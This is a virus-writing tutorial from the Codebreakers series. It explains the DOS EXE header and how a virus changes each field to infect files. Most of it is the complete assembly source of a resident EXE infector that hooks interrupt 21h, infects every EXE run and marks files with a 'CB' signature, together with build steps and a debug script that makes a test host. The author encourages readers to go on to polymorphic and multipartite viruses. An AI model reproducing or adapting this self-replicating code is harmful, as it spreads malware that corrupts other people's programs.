Lesson 4
Guide To EXE Infection
By Horny Toad
Lesson 1
Lesson 2
Lesson 3

Now onto the 4th lesson, EXE file infection. Boy, the topics never seem to get any easier, do they? The difficult aspect of EXE infection is that there is no ONE technique to cover all forms of EXE infection. I will, therefore, keep to the basics in this tutorial and in later articles, address different techniques which you can use.

What is an EXE file?

One of the first things that we need to do is understand what an EXE file is and more importantly what it looks like. Quite simply, an EXE file is an improvement over the COM file format in that allows the program size to exceed one segment (64k). COM programs are limited to 64K, including 256 bytes for the PSP. EXE files, on the other hand can occupy a much larger space by using more than one segment. The limit on an EXE file's size is the amount of memory/hard drive space you have. There are other characteristics that differ between the EXE and COM formats. In a COM file, the stack is automatically defined, whereas, in an EXE file, you need to initialize it yourself. This is probably the single most difficult concept to grasp when writing EXE files, the stack. Care must be taken that you define the stack large enough to handle all of the push and pop instructions that your program will use. If your stack is to small, your program is sure to crash. The next difference in the two file formats is the initializing of data segment. In a COM file, the data segment is defined as an area within the code segment. Since a COM file only uses one segment anyway, the data, code, and stack segments can all fall right together. Very convienient right? Well, in an EXE file, after the program loader puts the file in memory, both DS and ES contain the address of the PSP! Remember that! Always remember to load the address of the data segment into ds when coding EXE files.

At the heart of the EXE file format lies the EXE header. The EXE header is a minimum of 32 bytes that is used to describe a multitude of information about how the program needs to be loaded. Why I say that the header is the heart of the EXE file format, is that a virus which attacks EXE files, needs to utilize practically all of the information in the header. Therefore, pay attention so that you thoroughly understand this concept.

Let's take a look at the EXE header format:

The length of each element in the EXE header is 2 bytes (1 WORD). The descriptive names of each element in the header are the traditional names that have been used size the EXE file was created. You can give them whatever symbolic name you want to in you virus.

                           EXE Header Format

Offset          Length          Content         Description
-----------------------------------------------------------------------
0h              2               4Dh 5Ah         EXE file signature "MZ"

2h              2               PartPag         Length of last non-full
                                                page.
4h              2               PagCnt          Length of program in 512
                                                byte pages
6h              2               ReloCnt         Number of elements in
                                                the relocation table
8h              2               HdrSize         Header length in 
                                                paragraphs
0Ah             2               MinMem          Minimum memory left in
                                                paragraphs.
0Ch             2               MaxMem          Maximum memory left in
                                                paragraphs.
0Eh             2               ReloSS          Segment correction for
                                                stack (SS)
10h             2               ExeSP           Value of stack pointer
                                                (SP)
12h             2               ChkSum          Checksum

14h             2               ExeIP           Value of instruction
                                                pointer (IP)
16h             2               ReloCS          Segment correction for
                                                CS
18h             2               TablOff         Offset for the first
                                                relocation element
1Ah             2               Overlay         Overlay number
That looks very pretty, but how does it actually look? To tell you the truth, looking at the EXE header in DEBUG makes it look so much more simpler. The only catch is that you need to rename the extension to something other than ".EXE" in order to view the header. You can, if you know the exact program address, use the DEBUG L command to load a certain sector from a disk and then (D)isplay the contents of the sector. Nahh! Too complicated. Just rename the damn thing. Make sure that you have read Horny Toad & Opic's guide to disassembly and understand how to use DEBUG. I have included some sample files in this tutorial to give you some hands-on work with EXE files. One of the samples is a basic do-nothing EXE file. Let's say that I called this file someExe.exe. Below, I will display the contents of the someExe header.

At a prompt, type:

c:\>debug someExe.eww
-d

??:0100  4D 5A 11 00 02 00 01 00-20 00 11 00 FF FF 02 00  MZ...... .......
??:0110  00 01 00 00 00 00 00 00-3E 00 00 00 01 00 FB 71  ........>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00  jr..............
For an easier to read version of the same information, use SPo0ky's EXE header reader for the following results:
EXE Signature ........................................ MZ
Size of Last Page .................................... 0011
Number of 512 byte pages in file ..................... 0002
Number of Relocation Entries ......................... 0001
Header size in Paragraphs ............................ 0020
Minimum additional Memory required in paragraphs ..... 0011
Maximum additional Memory required in paragraphs ..... FFFF
Initial SS relative to start of file ................. 0002
Initial SP ........................................... 0100
Checksum (unused) .................................... 0000
Initial IP ........................................... 0000
Initial CS relative to start of file ................. 0000
Offset within Header of Relocation Table ............. 003E
Overlay Number ....................................... 0000

Relocation Table Entries:
        0000:0001
However you choose to read the EXE header is fine. At this point, just make sure that you are aware of its existance. I have begun including the debug scripts of the programs that I use in the tutorial so that people who do not have access to the Codebreakers magazine can extract all of the sample programs from the tutorial with the help of debug. The debug usage differs slightly from the other tutorials, so make sure you read the instructions at the end of this file.

Now, let's take a look at the individual contants of the EXE header and identify their function in the infection process.

EXE signature

The first word in the header is the traditional EXE file signature "MZ". These are the initials of Mark Zbikowski, the programmer who designed the EXE file format. Obviously, you already know from my last tutorial that you can use this unique signature to identify whether or not the file is of the EXE format.

PartPag and PagCnt (need to be modified)

PartPag and PagCnt make up the entire file size including header. PageCnt, as the name implies, is the length of the file expressed in 512 byte pages. PartPag is the amount of bytes that are on the last page of PageCnt. PartPag is expressed as length of the file mod 512. Mod. You better learn this concept now, because it will follow you on into higher programming languages such as C++.

5 % 2 = 1
5 / 2 = 2
The mod (%) is the remainder left over after division has taken place in non-floating point numbers. Simple enough. PartPag and PagCnt will need to be modified to allow for the inclusion of you virus code.

ReloCnt

The next item in the header represents the number of items in the relocation table. What the hell is a relocation table? A relocation table contains two words (offset,segment) for each element in the program that needs to be adjusted to account for segment location. You can skip over this because you will not have to make any modifications here but...

In the relocation table, both words are read and a relative segment address is computed by the sum of the loading segment address (usually PSP seg + 10h) and the segment address to the element that needs adjusting. The loading segment is then added to the element in memory at the relative segment address/offset.

HdrSize

The next element of the header is the header size. Quite self explanatory, the HdrSize holds the size of the header in 16-byte paragraphs. With the information that you have thus far seen, you can determine the actual bare program size with the equation:

Size=((PagCnt*512)-(HdrSize*16))-(512-PartPag)
You will also not have to fool with the header size.

MinMem & MaxMem

Shall we also have another obvious two contents: MinMem and MaxMem? These two values are used to allocate the amount of memory for the program.

ReloSS & ExeSP (need to be modified)

ReloSS and ExeSP are two items that need to be changed to account for the addition of code that you have just appended. ReloSS added with the starting segment address will give you your SS register.

Checksum (should be modified)

The Checksum item is the traditional place to store an infection marker.

ReloCS & ExeIP (need to be modified)

ReloCS is definitely an important item. The item stored here, along with the ExeIP, represents the beginning address to our virus code. This value will be initially saved from the host program so that it can be recalled and control returned back to the host.

TablOff

This is the offset to the first relocation element in the file.

Overlay

If this is the program main module, the value should be zero.

Below is a simple resident EXE infector. I choose to include a resident virus rather then a direct action infector, because I believe that, if you can write a resident EXE infector, making it non-resident would be a piece of cake. One thing that I was considering to do was to follow the modular style of coding that I used in the last tutorial. One trend that I was seeing in many viruses was that people were simply copying the code. After Slam #4 was released, you have no idea how many EXE infectors started to hit the scene that were essentially a word for word copy. Whatever. In the end, I decided to include the virus below so that you can see everything working in one virus, rather than the modular style of instruction. I am not sure which way is better, so I will probably continue to switch back and forth between styles. Another thing, while I am in the preaching mode, from now on, I will not be explaining the most basic concepts of assembly. If you have been following along with the tutorials, you should understand every concept that is in this tutorial. Really, the only new aspect that you need to be aware of with EXE infection is that you need to change certain values in the header to accomodate your virus. You already know how to do this. In the beginning tutorials, you played around with elements of the DTA. Well, you are going to be doing the same thing with the header, reading it into a buffer and reading and modifying the values that I have pointed out above.

.286
virus segment
  assume cs:virus, ds:virus, es:virus

 jumps
 org 0CBh

start:

  call delta                        ;Calculate delta offset
delta:
  pop bp
  sub bp,offset delta

  push ds                           ;save PSP address

  push cs cs
  pop ds es

  mov ax,0CBCBh                     ;our "Codebreaker" residency check
  int 21h                           ;>what is CB?
  cmp bx,0C001h                     ;>C001!! :o)
  je restore                        ;its already resident

  pop ds                            
  push ds                           ;PSP address back into DS
  ;--------------------------------------------------
  mov ax,ds                                 ;MCB residency
  dec ax                                    ;For further clarification
  mov ds,ax                                 ;read Codebreaker Tutorial 3

  sub word ptr ds:[3],40h
  sub word ptr ds:[12h],40h

  xor ax,ax
  mov ds,ax

  dec word ptr ds:[413h]

  mov ax,word ptr ds:[413h]
  shl ax,6

  mov es,ax

  push cs
  pop ds

  lea si,[bp+start]
  xor di,di
  mov cx,the_end - start
  rep movsb
  ;--------------------------------------------------
  xor ax,ax                                 ;Setting of interrupts
  mov ds,ax                                 ;For further clarification
                                            ;read Codebreaker Tutorial 3
  mov ax,es                                 
  mov bx,new_int21h-start
  cli
  xchg bx,word ptr ds:[21h*4]
  xchg ax,word ptr ds:[21h*4+2]
  mov word ptr es:[old_int21h-start],bx
  mov word ptr es:[old_int21h+2-start],ax
  sti
  ;--------------------------------------------------
  push cs cs
  pop ds es

  mov ah,9                                  ;Warns the poor shmuck
  lea dx,[bp+message]
  int 21h

restore:                                    ;Control handed back

  lea si,[bp+old_ip]                        ;Restore orig IP
  lea di,[bp+original_ip]
  mov cx,4
  rep movsw

; Now for a clarification of the next four lines. At the beginning of
; the virus DS contains the address of the PSP. We now restore the
; address from the stack, place the address in ES.  Then add 10h to
; skip over the PSP.  Skip over the PSP(100h) with 10h? Sounds a little
; fishy, right?  Well, remember that when you add 10h to AX, you are
; adding 10h segments. Each segment is 10h bytes, so 10h*10h=100h (PSP)

  pop ds
  mov ax,ds
  mov es,ax
  add ax,10h

  add word ptr cs:[bp+original_cs],ax       ;Orig CS
  cli
  add ax,word ptr cs:[bp+original_ss]       ;Orig SS
  mov ss,ax
  mov sp,word ptr cs:[bp+original_sp]       ;Orig SP
  sti

 db 0eah                                    ;jump to to it
 original_ip dw ?                           ;
 original_cs dw ?
 original_ss dw ?
 original_sp dw ?


 new_int21h:                                ;our int 21h handler
  pushf                                     ;push the flags
  cmp ax,0CBCBh                             ;residency check
  jne no_install_check
  mov bx,0C001h                             ;already resident
  popf                                      ;restore all flags
  iret                                      ;return
 no_install_check:
  cmp ah,4bh                                ;check if execute
  je infect
 return:
  popf                                      ;restore all flags
 db 0eah                                    ;jmp to orig int 21h
 old_int21h dd ?

 infect:
  pusha                                     ;only 286, saves all gen reg
  push ds
  push es

  call tsr_delta
 tsr_delta:
  pop bp                                    ;a tsr delta offset %-)
  sub bp,offset tsr_delta

  mov ax,3d02h                              ;open file in DS:DX
  int 21h
  jc exit

  xchg ax,bx                                ;file handle to bx

  push cs cs
  pop ds es

  mov ah,3fh                                ;Read the target header
  lea dx,[bp+header]                        ;into our buffer

  mov cx,1ch
  int 21h

  cmp word ptr cs:[bp+header],'ZM'          ;check if its an EXE
  je ok
  cmp word ptr cs:[bp+header],'MZ'
  je ok
  jmp close

 ok:
  cmp word ptr cs:[bp+header+12h],'BC'      ;Checksum value checked for
  je close                                  ;previous infection

  mov word ptr cs:[bp+header+12h],'BC'      ;Mark it as infected

  mov ax,word ptr cs:[bp+header+14h]        ;Save orig ExeIP
  mov word ptr cs:[bp+old_ip],ax            ;Store in our buffer
  mov ax,word ptr cs:[bp+header+16h]        ;Save orig ReloCS
  mov word ptr cs:[bp+old_cs],ax            
  mov ax,word ptr cs:[bp+header+0eh]        ;Save orig ReloSS
  mov word ptr cs:[bp+old_ss],ax
  mov ax,word ptr cs:[bp+header+10h]        ;Save orig ExeSP
  mov word ptr cs:[bp+old_sp],ax

  mov ax,4202h                              ;Set pointer to end of file
  xor cx,cx
  xor dx,dx
  int 21h

  push ax dx                                ;Save EOF results

                                            ;Calculate new CS:IP, we set
                                            ;it to the EOF (this is where
                                            ;we will attach our virus)

  mov cx,16                                 ;Convert filesize into 16 byte
  div cx                                    ;paragraphs

  sub ax,word ptr cs:[bp+header+8]          ;Substract Header size from
                                            ;filesize to get the image
                                            ;(code/data) size.

                                            ;save:
  mov word ptr cs:[bp+header+14h],dx        ;New ExeIP
  mov word ptr cs:[bp+header+16h],ax        ;New ReloCS

  pop dx ax                                 ;restore saved filesize

  add ax,the_end - start                    ;Add virus size to file size
  adc dx,0                                  ;Adds carry to DX

  mov cx,512                                ;Calculate amount of pages
  div cx

  cmp dx,0
  je no_remainder
  inc ax                                    ;if remainder, add 1
 no_remainder:

  mov word ptr cs:[bp+header+4],ax          ;New PageCnt
  mov word ptr cs:[bp+header+2],dx          ;New PartPag

  mov ah,40h                                ;write the virus to the EOF
  lea dx,[bp+start]
  mov cx,the_end - start
  int 21h

  mov ax,4200h                              ;Send pointer to beginning
  xor cx,cx
  xor dx,dx
  int 21h

  mov ah,40h                                ;Write the new header
  lea dx,[bp+header]
  mov cx,1ch
  int 21h

mov al,7
int 29h                                     ; just a BEEEEEPPP

 close:
  mov ah,3eh                                ;close file
  int 21h

 exit:
  pop es
  pop ds
  popa
  jmp return


 old_ip dw offset exit_prog
 old_cs dw 0
 old_ss dw 0
 old_sp dw 0fffeh

 header db 1ch dup(?)                       ;Buffer for header

 message db 10,13,10,13
 db '- SPo0ky''s EXAMPLE TSR EXE infector for Horny Toad''s ''Guide To EXE Infection'' -',10,13
 db '- has been installed in your computers memory and will from now on infect any -',10,13
 db '- EXE file that you execute.                                                  -',10,13
 db '- You can use TBCLEAN (www.thunderbyte.com) to clean this virus.              -',10,13,10,13
 db '                           - www.codebreakers.org -',10,13,'$'

 the_end:

 exit_prog:
  mov ax,4c00h                              ;Request terminate program
  int 21h
 
virus ends
end start
In order to see the above virus work. Cut the virus out of this file and save it in a file exevir.asm.

At a prompt with TASM/TLINK in the same directory, type:

c:\>tasm exevir.asm
c:\>tlink exevir.obj
Use the myexe.exe (below) as the host program. With both of the programs in the same directory, execute the virus, then execute the host program. If you look at the filesize using the (dir)ectory command, you will see that it has increased in length. Test this virus in a MSDOS box from windows and when you exit out of the MSDOS box, the virus will be gone. If you check the header now, you will be able to see the changes made after infection. Take a look at that beautiful "CB" infection marker.
??:0100  4D 5A 5A 01 03 00 01 00-20 00 11 00 FF FF 02 00   MZZ..... .......
??:0110  00 01 43 42 01 00 01 00-3E 00 00 00 01 00 FB 71   ..CB....>......q
??:0120  6A 72 00 00 00 00 00 00-00 00 00 00 00 00 00 00   jr..............
To write the definitive guide to all forms of EXE infection, I would need to quit my day job (which I've thought of doing) and just write a book. In the end it is better to have a bunch of installments attacking each issue and facet of virus writing. Look for the future Codebreaker tutorials become much more specific and advanced. If you can understand how to infect COM and EXE files, along with what role encryption and polymorphism can aid in virus effectivness, you are well on you way to making some really awesome creations. The only thing that you need to add from here is some boot infection techniques to the virus and watch out, you'll have a decent multipartide virus. I guess my one piece of advice now is to read code and absorb it. Start to become critical of others code and use that knowledge and judgement to develope your own style. Enough preaching!

Have fun!
Good luck!

Horny Toad


SAMPLE PROGRAMS USED IN TUTORIAL

In order to extract this sample program, cut it out of this file and paste it into a file named "myexe.txt".

At the prompt, type:

c:\>debug < myexe.txt
c:\>rename myexe.exd myexe.exe
You will then have a sample infectable EXE file.
N MYEXE.EXD
E 0100 4D 5A 11 00 02 00 01 00 20 00 11 00 FF FF 02 00 
E 0110 00 01 00 00 00 00 00 00 3E 00 00 00 01 00 FB 71 
E 0120 6A 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 
E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
E 0300 B8 01 00 8E D8 8E C0 B4 4C A0 00 00 CD 21 00 00 
E 0310 00 
RCX
0211
W
Q